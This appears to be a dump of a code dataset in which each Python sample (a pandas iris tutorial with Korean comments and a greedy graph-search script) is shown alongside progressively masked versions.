learning_phase:\n School.class_digital_logic(Main_C1)\n School.simple_custom_fitting_class(Main_C1)\n # Main_C1.fit_custom_fx(np.mean,input_width=1500, output_width=1, task_name='np.mean')\n yp = Main_C1.predict(np.random.randn(8, 22))\n print 'Predicted value is ', yp\n # Main_C1.remove_classifier('np.mean')\n\n Main_C1.status()\n pickle.dump(Main_C1, open(classifier_file_name, 'w'))\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# 라이브러리 환경
import pandas as pd
import numpy as np
# sklearn 테이터셋에서 iris 데이터셋 로딩
from sklearn import datasets
iris = datasets.load_iris()
# iris 데이터셋은 딕셔너리 형태이므로, key 값 확인
'''
print(iris.keys())
print(iris['DESCR'])
print("데이터 셋 크기:", iris['target'])
print("데이터 셋 내용:\n", iris['target'])
'''
# data 속성의 데이터셋 크기
print("데이터 셋 크기:", iris['data'].shape)
# data 속성의 데이터셋 내용(첫 7개 행 추출)
data1 = ['a', 'b', 'c', 'd', 'e']
print(type(data1))
sr1 = pd.Series(data1)
# print(type(sr1))
data2 = (1, 2, 3.14, 100, -10)
sr2 = pd.Series(data2)
dict_data = {'c1':data1, 'c2':data2}
df = pd.DataFrame(dict_data)
print(df)
# 열(columns)과 행(index)이름 바꾸기
df.columns = ['string1', 'string2']
df.index = ['r1', 'r2', 'r3', 'r4', 'r5']
# print(df.loc['r2':'r4', 'string1':'string2'])
print('데이터셋 내용:\n', iris['data'][:7, :])
df = pd.DataFrame(iris['data'], columns=iris['feature_names'])
print('데이터 프레임의 형태:', df.shape)
df.columns = ['sepal_length', 'sepal_width', 'petal_length', 'petal_width']
print(df.head(2))
df['Target'] = iris['target']
print(df.head())
x = [2, 1, 13, 4, 15, 26]
y = [0, 4, 31, 2, 42, 54]
df = pd.DataFrame({'X':x, 'Y':y})
print(df)
|
normal
|
{
"blob_id": "dc2c9293040204f0ec2156c41b8be624f4e5cf99",
"index": 8389,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('데이터 셋 크기:', iris['data'].shape)\n<mask token>\nprint(type(data1))\n<mask token>\nprint(df)\n<mask token>\nprint('데이터셋 내용:\\n', iris['data'][:7, :])\n<mask token>\nprint('데이터 프레임의 형태:', df.shape)\n<mask token>\nprint(df.head(2))\n<mask token>\nprint(df.head())\n<mask token>\nprint(df)\n",
"step-3": "<mask token>\niris = datasets.load_iris()\n<mask token>\nprint('데이터 셋 크기:', iris['data'].shape)\ndata1 = ['a', 'b', 'c', 'd', 'e']\nprint(type(data1))\nsr1 = pd.Series(data1)\ndata2 = 1, 2, 3.14, 100, -10\nsr2 = pd.Series(data2)\ndict_data = {'c1': data1, 'c2': data2}\ndf = pd.DataFrame(dict_data)\nprint(df)\ndf.columns = ['string1', 'string2']\ndf.index = ['r1', 'r2', 'r3', 'r4', 'r5']\nprint('데이터셋 내용:\\n', iris['data'][:7, :])\ndf = pd.DataFrame(iris['data'], columns=iris['feature_names'])\nprint('데이터 프레임의 형태:', df.shape)\ndf.columns = ['sepal_length', 'sepal_width', 'petal_length', 'petal_width']\nprint(df.head(2))\ndf['Target'] = iris['target']\nprint(df.head())\nx = [2, 1, 13, 4, 15, 26]\ny = [0, 4, 31, 2, 42, 54]\ndf = pd.DataFrame({'X': x, 'Y': y})\nprint(df)\n",
"step-4": "import pandas as pd\nimport numpy as np\nfrom sklearn import datasets\niris = datasets.load_iris()\n<mask token>\nprint('데이터 셋 크기:', iris['data'].shape)\ndata1 = ['a', 'b', 'c', 'd', 'e']\nprint(type(data1))\nsr1 = pd.Series(data1)\ndata2 = 1, 2, 3.14, 100, -10\nsr2 = pd.Series(data2)\ndict_data = {'c1': data1, 'c2': data2}\ndf = pd.DataFrame(dict_data)\nprint(df)\ndf.columns = ['string1', 'string2']\ndf.index = ['r1', 'r2', 'r3', 'r4', 'r5']\nprint('데이터셋 내용:\\n', iris['data'][:7, :])\ndf = pd.DataFrame(iris['data'], columns=iris['feature_names'])\nprint('데이터 프레임의 형태:', df.shape)\ndf.columns = ['sepal_length', 'sepal_width', 'petal_length', 'petal_width']\nprint(df.head(2))\ndf['Target'] = iris['target']\nprint(df.head())\nx = [2, 1, 13, 4, 15, 26]\ny = [0, 4, 31, 2, 42, 54]\ndf = pd.DataFrame({'X': x, 'Y': y})\nprint(df)\n",
"step-5": "# 라이브러리 환경\nimport pandas as pd\nimport numpy as np\n\n# sklearn 테이터셋에서 iris 데이터셋 로딩\nfrom sklearn import datasets\niris = datasets.load_iris()\n\n# iris 데이터셋은 딕셔너리 형태이므로, key 값 확인\n'''\nprint(iris.keys())\nprint(iris['DESCR'])\nprint(\"데이터 셋 크기:\", iris['target'])\nprint(\"데이터 셋 내용:\\n\", iris['target'])\n'''\n\n# data 속성의 데이터셋 크기\nprint(\"데이터 셋 크기:\", iris['data'].shape)\n\n# data 속성의 데이터셋 내용(첫 7개 행 추출)\ndata1 = ['a', 'b', 'c', 'd', 'e']\nprint(type(data1))\nsr1 = pd.Series(data1)\n# print(type(sr1))\ndata2 = (1, 2, 3.14, 100, -10)\nsr2 = pd.Series(data2)\n\ndict_data = {'c1':data1, 'c2':data2}\ndf = pd.DataFrame(dict_data)\nprint(df)\n\n\n# 열(columns)과 행(index)이름 바꾸기\ndf.columns = ['string1', 'string2']\ndf.index = ['r1', 'r2', 'r3', 'r4', 'r5']\n\n# print(df.loc['r2':'r4', 'string1':'string2'])\n\nprint('데이터셋 내용:\\n', iris['data'][:7, :])\ndf = pd.DataFrame(iris['data'], columns=iris['feature_names'])\n\nprint('데이터 프레임의 형태:', df.shape)\ndf.columns = ['sepal_length', 'sepal_width', 'petal_length', 'petal_width']\nprint(df.head(2))\n\ndf['Target'] = iris['target']\nprint(df.head())\n\nx = [2, 1, 13, 4, 15, 26]\ny = [0, 4, 31, 2, 42, 54]\n\ndf = pd.DataFrame({'X':x, 'Y':y})\nprint(df)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import numpy as np
from StudyCaseUdemy.Graph import Graph
class OrderVector:
def __init__(self, size):
self.size = size
self.last_pos = -1
self.values = np.empty(self.size, dtype=object)
def insert(self, vertex):
if self.last_pos == self.size - 1:
print('Capacidad max do Vector atingida')
return
pos = 0
for i in range(self.last_pos+1):
pos = i
temp = self.values[i]
if self.values[i].distance > vertex.distance:
break
if i == self.last_pos:
pos = i + 1
x = self.last_pos
while x >= pos:
self.values[x + 1] = self.values[x]
x -= 1
self.values[pos] = vertex
self.last_pos += 1
def printer(self):
if self.last_pos == -1:
print('Empty Array')
else:
for i in range(self.last_pos+1):
print(i, ' - ', self.values[i].label, ' - ', self.values[i].distance)
class Greedy:
def __init__(self, objective):
self.objective = objective
self.found = False
def search(self, current):
print('------')
print('Current Vertex: {}'.format(current.label))
current.visited = True
if current == self.objective:
self.found = True
else:
orderVector = OrderVector(len(current.adjacents))
for adj in current.adjacents:
if not adj.vertex.visited:
adj.vertex.visited = True
orderVector.insert(adj.vertex)
orderVector.printer()
if orderVector.values[0] is not None:
self.search(orderVector.values[0])
grafo = Graph()
# vector = OrderVector(5)
# vector.insert(grafo.arad)
# vector.insert(grafo.craiova)
# vector.insert(grafo.bucharest)
# vector.insert(grafo.dobreta)
# vector.insert(grafo.lugoj)
# vector.printer()
greedy = Greedy(grafo.bucharest)
greedy.search(grafo.arad)
|
normal
|
{
"blob_id": "87291d066b94aca1d94cbe5d9281fc72da1b0c35",
"index": 9483,
"step-1": "<mask token>\n\n\nclass OrderVector:\n <mask token>\n\n def insert(self, vertex):\n if self.last_pos == self.size - 1:\n print('Capacidad max do Vector atingida')\n return\n pos = 0\n for i in range(self.last_pos + 1):\n pos = i\n temp = self.values[i]\n if self.values[i].distance > vertex.distance:\n break\n if i == self.last_pos:\n pos = i + 1\n x = self.last_pos\n while x >= pos:\n self.values[x + 1] = self.values[x]\n x -= 1\n self.values[pos] = vertex\n self.last_pos += 1\n\n def printer(self):\n if self.last_pos == -1:\n print('Empty Array')\n else:\n for i in range(self.last_pos + 1):\n print(i, ' - ', self.values[i].label, ' - ', self.values[i]\n .distance)\n\n\nclass Greedy:\n\n def __init__(self, objective):\n self.objective = objective\n self.found = False\n\n def search(self, current):\n print('------')\n print('Current Vertex: {}'.format(current.label))\n current.visited = True\n if current == self.objective:\n self.found = True\n else:\n orderVector = OrderVector(len(current.adjacents))\n for adj in current.adjacents:\n if not adj.vertex.visited:\n adj.vertex.visited = True\n orderVector.insert(adj.vertex)\n orderVector.printer()\n if orderVector.values[0] is not None:\n self.search(orderVector.values[0])\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass OrderVector:\n\n def __init__(self, size):\n self.size = size\n self.last_pos = -1\n self.values = np.empty(self.size, dtype=object)\n\n def insert(self, vertex):\n if self.last_pos == self.size - 1:\n print('Capacidad max do Vector atingida')\n return\n pos = 0\n for i in range(self.last_pos + 1):\n pos = i\n temp = self.values[i]\n if self.values[i].distance > vertex.distance:\n break\n if i == self.last_pos:\n pos = i + 1\n x = self.last_pos\n while x >= pos:\n self.values[x + 1] = self.values[x]\n x -= 1\n self.values[pos] = vertex\n self.last_pos += 1\n\n def printer(self):\n if self.last_pos == -1:\n print('Empty Array')\n else:\n for i in range(self.last_pos + 1):\n print(i, ' - ', self.values[i].label, ' - ', self.values[i]\n .distance)\n\n\nclass Greedy:\n\n def __init__(self, objective):\n self.objective = objective\n self.found = False\n\n def search(self, current):\n print('------')\n print('Current Vertex: {}'.format(current.label))\n current.visited = True\n if current == self.objective:\n self.found = True\n else:\n orderVector = OrderVector(len(current.adjacents))\n for adj in current.adjacents:\n if not adj.vertex.visited:\n adj.vertex.visited = True\n orderVector.insert(adj.vertex)\n orderVector.printer()\n if orderVector.values[0] is not None:\n self.search(orderVector.values[0])\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass OrderVector:\n\n def __init__(self, size):\n self.size = size\n self.last_pos = -1\n self.values = np.empty(self.size, dtype=object)\n\n def insert(self, vertex):\n if self.last_pos == self.size - 1:\n print('Capacidad max do Vector atingida')\n return\n pos = 0\n for i in range(self.last_pos + 1):\n pos = i\n temp = self.values[i]\n if self.values[i].distance > vertex.distance:\n break\n if i == self.last_pos:\n pos = i + 1\n x = self.last_pos\n while x >= pos:\n self.values[x + 1] = self.values[x]\n x -= 1\n self.values[pos] = vertex\n self.last_pos += 1\n\n def printer(self):\n if self.last_pos == -1:\n print('Empty Array')\n else:\n for i in range(self.last_pos + 1):\n print(i, ' - ', self.values[i].label, ' - ', self.values[i]\n .distance)\n\n\nclass Greedy:\n\n def __init__(self, objective):\n self.objective = objective\n self.found = False\n\n def search(self, current):\n print('------')\n print('Current Vertex: {}'.format(current.label))\n current.visited = True\n if current == self.objective:\n self.found = True\n else:\n orderVector = OrderVector(len(current.adjacents))\n for adj in current.adjacents:\n if not adj.vertex.visited:\n adj.vertex.visited = True\n orderVector.insert(adj.vertex)\n orderVector.printer()\n if orderVector.values[0] is not None:\n self.search(orderVector.values[0])\n\n\ngrafo = Graph()\ngreedy = Greedy(grafo.bucharest)\ngreedy.search(grafo.arad)\n",
"step-4": "import numpy as np\nfrom StudyCaseUdemy.Graph import Graph\n\n\nclass OrderVector:\n\n def __init__(self, size):\n self.size = size\n self.last_pos = -1\n self.values = np.empty(self.size, dtype=object)\n\n def insert(self, vertex):\n if self.last_pos == self.size - 1:\n print('Capacidad max do Vector atingida')\n return\n pos = 0\n for i in range(self.last_pos + 1):\n pos = i\n temp = self.values[i]\n if self.values[i].distance > vertex.distance:\n break\n if i == self.last_pos:\n pos = i + 1\n x = self.last_pos\n while x >= pos:\n self.values[x + 1] = self.values[x]\n x -= 1\n self.values[pos] = vertex\n self.last_pos += 1\n\n def printer(self):\n if self.last_pos == -1:\n print('Empty Array')\n else:\n for i in range(self.last_pos + 1):\n print(i, ' - ', self.values[i].label, ' - ', self.values[i]\n .distance)\n\n\nclass Greedy:\n\n def __init__(self, objective):\n self.objective = objective\n self.found = False\n\n def search(self, current):\n print('------')\n print('Current Vertex: {}'.format(current.label))\n current.visited = True\n if current == self.objective:\n self.found = True\n else:\n orderVector = OrderVector(len(current.adjacents))\n for adj in current.adjacents:\n if not adj.vertex.visited:\n adj.vertex.visited = True\n orderVector.insert(adj.vertex)\n orderVector.printer()\n if orderVector.values[0] is not None:\n self.search(orderVector.values[0])\n\n\ngrafo = Graph()\ngreedy = Greedy(grafo.bucharest)\ngreedy.search(grafo.arad)\n",
"step-5": "import numpy as np\nfrom StudyCaseUdemy.Graph import Graph\n\nclass OrderVector:\n def __init__(self, size):\n self.size = size\n self.last_pos = -1\n self.values = np.empty(self.size, dtype=object)\n\n def insert(self, vertex):\n if self.last_pos == self.size - 1:\n print('Capacidad max do Vector atingida')\n return\n pos = 0\n for i in range(self.last_pos+1):\n pos = i\n temp = self.values[i]\n if self.values[i].distance > vertex.distance:\n break\n if i == self.last_pos:\n pos = i + 1\n x = self.last_pos\n while x >= pos:\n self.values[x + 1] = self.values[x]\n x -= 1\n self.values[pos] = vertex\n self.last_pos += 1\n\n def printer(self):\n if self.last_pos == -1:\n print('Empty Array')\n else:\n for i in range(self.last_pos+1):\n print(i, ' - ', self.values[i].label, ' - ', self.values[i].distance)\n\n\nclass Greedy:\n def __init__(self, objective):\n self.objective = objective\n self.found = False\n\n def search(self, current):\n print('------')\n print('Current Vertex: {}'.format(current.label))\n current.visited = True\n if current == self.objective:\n self.found = True\n\n else:\n orderVector = OrderVector(len(current.adjacents))\n for adj in current.adjacents:\n if not adj.vertex.visited:\n adj.vertex.visited = True\n orderVector.insert(adj.vertex)\n orderVector.printer()\n if orderVector.values[0] is not None:\n self.search(orderVector.values[0])\n\n\n\ngrafo = Graph()\n# vector = OrderVector(5)\n# vector.insert(grafo.arad)\n# vector.insert(grafo.craiova)\n# vector.insert(grafo.bucharest)\n# vector.insert(grafo.dobreta)\n# vector.insert(grafo.lugoj)\n\n\n# vector.printer()\ngreedy = Greedy(grafo.bucharest)\ngreedy.search(grafo.arad)\n",
"step-ids": [
6,
7,
9,
10,
11
]
}
|
[
6,
7,
9,
10,
11
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.